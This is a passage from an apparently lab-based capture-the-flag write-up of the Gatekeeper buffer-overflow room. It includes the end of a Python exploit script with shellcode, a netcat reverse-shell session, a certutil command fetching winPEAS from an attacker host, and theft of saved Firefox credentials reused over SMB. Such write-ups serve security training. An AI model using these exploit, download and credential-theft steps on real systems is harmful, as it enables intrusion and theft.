payload += b"\xf5\xf8\x5a\x4e\x08\x03\x9b\x47\xcf\x57\xcb\xff\xe6\xd7\x80"
payload += b"\xff\x07\x02\x06\xaf\xa7\xfd\xe7\x1f\x08\xae\x8f\x75\x87\x91"
payload += b"\xb0\x76\x4d\xba\x5b\x8d\x06\xcf\x92\x88\x10\xa7\xa6\x92\x89"
payload += b"\x8b\x2e\x74\xdb\xfb\x66\x2f\x74\x65\x23\xbb\xe5\x6a\xf9\xc6"
payload += b"\x26\xe0\x0e\x37\xe8\x01\x7a\x2b\x9d\xe1\x31\x11\x08\xfd\xef"
payload += b"\x3d\xd6\x6c\x74\xbd\x91\x8c\x23\xea\xf6\x63\x3a\x7e\xeb\xda"
payload += b"\x94\x9c\xf6\xbb\xdf\x24\x2d\x78\xe1\xa5\xa0\xc4\xc5\xb5\x7c"
payload += b"\xc4\x41\xe1\xd0\x93\x1f\x5f\x97\x4d\xee\x09\x41\x21\xb8\xdd"
payload += b"\x14\x09\x7b\x9b\x18\x44\x0d\x43\xa8\x31\x48\x7c\x05\xd6\x5c"
payload += b"\x05\x7b\x46\xa2\xdc\x3f\x76\xe9\x7c\x69\x1f\xb4\x15\x2b\x42"
payload += b"\x47\xc0\x68\x7b\xc4\xe0\x10\x78\xd4\x81\x15\xc4\x52\x7a\x64"
payload += b"\x55\x37\x7c\xdb\x56\x12"




print("Attempting to connect to chat server and send payload")
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    print("Connected")
except Exception as e:
    print("Error Connecting")
    print(e)
    sys.exit(1)
print("Sennding payload")
try:
    print("Sending payload")
    s.send(payload + b'\r\n')
except Exception as e:
    print("Error sending data")
    print(e)
    sys.exit(1)

finally:
    print("Closing socket")
    s.close()
─⠠⠵ nc -lvnp 5555
Listening on 0.0.0.0 5555



sConnection received on 10.10.2.248 49185
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\natbat\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 3ABE-D44B

 Directory of C:\Users\natbat\Desktop

05/14/2020  09:24 PM    <DIR>          .
05/14/2020  09:24 PM    <DIR>          ..
04/21/2020  05:00 PM             1,197 Firefox.lnk
04/20/2020  01:27 AM            13,312 gatekeeper.exe
04/21/2020  09:53 PM               135 gatekeeperstart.bat
05/14/2020  09:43 PM               140 user.txt.txt
               4 File(s)         14,784 bytes
               2 Dir(s)  15,879,127,040 bytes free

C:\Users\natbat\Desktop>type user.txt.txt
type user.txt.txt
[REDACTED]

The buffer overflow in this room is credited to Justin Steven and his "dostackbufferoverflowgood" program. Thank you!

Answer: [REDACTED]

Locate and find the Root Flag

Using certutil we can copy winPEAS across to the box.

certutil.exe -urlcache -f http://10.9.5.198:9999/winPEAS.bat winPEAS.bat

Running winPEAS we see the below interesting bits

C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release\places.sqlite
C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release\key4.db
C:\Windows\Panther\unattend.xml

Copying off the Firefox data into a test user on our box we can launch Firefox and see some saved credentials in one of the profiles

We can then use this username/password combo with smbclient

╰─⠠⠵ smbclient //gatekeeper/c$ -U mayor
Enter WORKGROUP\mayor's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                      DHS        0  Tue Apr 21 21:56:54 2020
  Boot                              DHS        0  Sun Apr 19 20:51:20 2020
  bootmgr                          AHSR   383786  Sun Nov 21 03:23:51 2010
  BOOTSECT.BAK                     AHSR     8192  Sun Apr 19 20:51:20 2020
  bootsqm.dat                         N     3280  Fri May 15 22:32:51 2020
  Documents and Settings            DHS        0  Tue Jul 14 06:08:56 2009
  hiberfil.sys                      AHS 804999168  Thu Mar 18 01:40:52 2021
  pagefile.sys                      AHS 1073741824  Thu Mar 18 01:40:53 2021
  PerfLogs                            D        0  Tue Jul 14 04:20:08 2009
  Program Files                      DR        0  Mon Apr 20 06:16:22 2020
  Program Files (x86)                DR        0  Wed Apr 22 03:45:02 2020
  ProgramData                        DH        0  Fri May 15 22:40:33 2020
  Recovery                          DHS        0  Sun Apr 19 16:55:25 2020
  System Volume Information         DHS        0  Fri May 15 22:40:26 2020
  Users                              DR        0  Fri May 15 02:57:08 2020
  Windows                             D        0  Fri May 15 22:41:18 2020

		7863807 blocks of size 4096. 3869143 blocks available
smb: \> cd Users\mayor\desktop
smb: \Users\mayor\desktop\> dir
  .                                  DR        0  Fri May 15 02:58:07 2020
  ..                                 DR        0  Fri May 15 02:58:07 2020
  desktop.ini                       AHS      282  Sun Apr 19 16:55:56 2020
  root.txt.txt                        A       27  Fri May 15 02:21:09 2020

		7863807 blocks of size 4096. 3869143 blocks available

smb: \Users\mayor\desktop\> get root.txt.txt
getting file \Users\mayor\desktop\root.txt.txt of size 27 as root.txt.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \Users\mayor\desktop\> exit

╰─⠠⠵ cat root.txt.txt 
[REDCACTED]

Answer: [REDCACTED]

Boom, another room done

I have been putting off Buffer Overflow room's for a while as I just couldn't get motivated to do them but that is now 2 in 2 days. This one was another interesting one to sharpen my skills.

Show Comments